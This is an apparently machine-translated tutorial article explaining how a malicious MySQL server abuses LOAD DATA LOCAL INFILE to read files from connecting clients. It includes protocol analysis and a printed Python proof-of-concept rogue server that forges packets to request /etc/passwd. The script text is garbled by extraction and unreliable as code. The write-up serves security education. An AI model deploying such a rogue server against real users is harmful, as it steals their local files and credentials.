Shulou(Shulou.com)05/31 Report--

This article shows you how to achieve MySQL client attack chain exploration, the content is concise and easy to understand, absolutely can make your eyes bright, through the detailed introduction of this article, I hope you can get something.

0X01 text

MySQL LOAD DATA characteristics

The LOAD DATA statement can load files on the server host, and if you specify the LOCAL keyword, you can load client files.

Let's look at the description of the official document.

Mysql officials have stated the harmfulness of LOAD DATA in the official documentation, and have made strict restrictions on the use of LOAD DATA features, such as the setting of secure_file_priv.

The value of secure_file_priv is / var/lib/mysql-files/, so what are the settings for secure_file_priv?

If secure_file_priv is null, import and export are not allowed.

When secure_file_priv specifies a folder, it means that the import and export of mysql can only occur in the specified folder.

When secure_file_priv is not set, there are no restrictions

There are two commonly used statement collocations for LOAD DATA, namely, manipulating client and server files:

Load data local infile "file path" into table table name fields terminated by 'delimiter'; load data infile "file path" into table table name fields terminated by 'delimiter'

The first statement means to read the file on the client and save it in the corresponding table, and the second statement reads the file on the server and stores it in the corresponding table. We should focus on LOAD DATA LOCAL INFILE, because with this we can read arbitrary files under certain conditions!

However, as mentioned earlier, we have a secure_file_priv, and this parameter limits the path to which we read the file, so let's configure it first so that we can do it later.

Protocol analysis

Environment: ubuntu 16.0.4 MySQL 5.7.23

Tool: tcpdump

The packet capture command used here is:

Tcpdump-i lo port 3306-w mysql.cap-v

The interaction between mysql client and server is mainly divided into two stages: handshake authentication phase and command execution phase.

The handshake is a three-way handshake for TCP. Here, let's simplify it and focus on analyzing its command execution phase.

First, the server sends a Greeting greeting packet to the client

Mainly for mysql and server some banner information!

The client then sends an Authentication packet, which is used to make a login request, sending a username password (the password is encrypted by two layers of sha1) and some config.

Next, the query package sent by the client starts with some initialization queries! For example: select @ @ version_comment limit 1

Then there is our query package content load data local infile statement!

After receiving our Query query, the server will return a response package containing the filename of our request!

Finally, the client sends a Response TABULAR content to the server to request the contents of the file for the server!

So far, we have read the files from the client, and we can read any files without secure_file_priv restrictions!

So here's the problem. Let's take a look at the official documents again!

From the official documents, we can know that when the server requests the client file, there is no agreement to specify the file. In this case, the server only needs to provide the file name to read any file on the client. If we construct a malicious server, when the client connects, we only need to forge the file transfer package to achieve file reading! Of course, the premise is that the LOAD DATA LOCAL setting is enabled.

The process is shown in the figure:

Build a malicious server

To build a malicious server, you need to meet the following three conditions:

First send the Server Greeting packet to MySQL Client

Wait for the Client side to send a Query Package packet

Then reply to a file transfer request to read the file

First, we need to know how to construct File Transfer and Server Greeting packets, and the format of the packets is given in the official mysql documentation.

File Transfer packet format: https://dev.mysql.com/doc/internals/en/com-query-response.html

We need to wait for a query request from Client before we can reply to the server's request to read the file.

Greeting packet format: https://dev.mysql.com/doc/internals/en/connection-phase-packets.html#packet-Protocol::Handshake

test

Poc

Source code: https://www.vesiluoma.com/abusing-mysql-clients/

#! / usr/bin/python#coding: utf8import socket# linux: # filestring = "/ etc/passwd" # windows:#filestring = "C:\\ Windows\\ system32\\ drivers\\ etc\\ hosts" HOST = "0.0.0.0" # open for eeeeveryone! ^ _ ^ PORT = 3306BUFFER_SIZE = 1024.1 Greetinggreeting = "\ x5b\ X00\ X0a\ x35\ x2e\ x36\ x2e\ x32\ x38\ x2d\ x30\ x75\ x62\ x6e\ x74\ x75\ X30\ x2e\ x31\ x34\ x2e\ x30\ x34\ x31\ x00\ x2d\ x00\ x00\ x40\ x3f\ x59\ x26\ x4b\ x2b\ x34\ x60\ xf7\ x08\ x02\ X7f\ x80\ x15\ x00\ x00\ X00\ X00\ x00\ x68\ x69\ x5F\ x552\ x63\ x55\ x60\ x64\ x53\ x52\ x6d\ x79\ x73\ x71x6c\ x5f\ x5F\ x63\ x55\ x60\ x64\ x53\ x52\ x6d\ x79\ x73\ x71x6c\ x5f X6e\ x61\ x74\ x69\ x65\ x5f\ x70\ x61\ x73\ x73\ x77\ x6f\ x72\ x64\ x00 "# 2 Accept all authenticationsauthok ="\ x07\ x00\ x00\ X02\ X00\ X00 "# 3 Payload# packet length payloadlen ="\ X0c "padding ="\ X00\ X00 "payload = payloadlen + padding +"\ X01\ xfb\ x2f\ x65\ x74\ x63\ x2f\ x70\ x61\ x73\ x77\ x64 "s = socket.socket Socket.SOCK_STREAM) s.setsockopt (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind ((HOST, PORT)) s.listen (1) while True:conn, addr = s.accept () print 'Connection from:' Addr conn.send (greeting) while True:data = conn.recv (BUFFER_SIZE) print ".join (" x "% ord (I) for i in data) conn.send (authok) data = conn.recv (BUFFER_SIZE) conn.send (payload) print" [*] Payload send! "data = conn.recv (BUFFER_SIZE) if not data: breakprint" Data received: ", databreak# Don't leave the connection open.conn.close ()

Github Project: https://github.com/allyshka/Rogue-MySql-Server

Attack effect

To test the project using github, first run the script as follows:

We can find that we can read any file.

The above content is how to explore the MySQL client attack chain. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.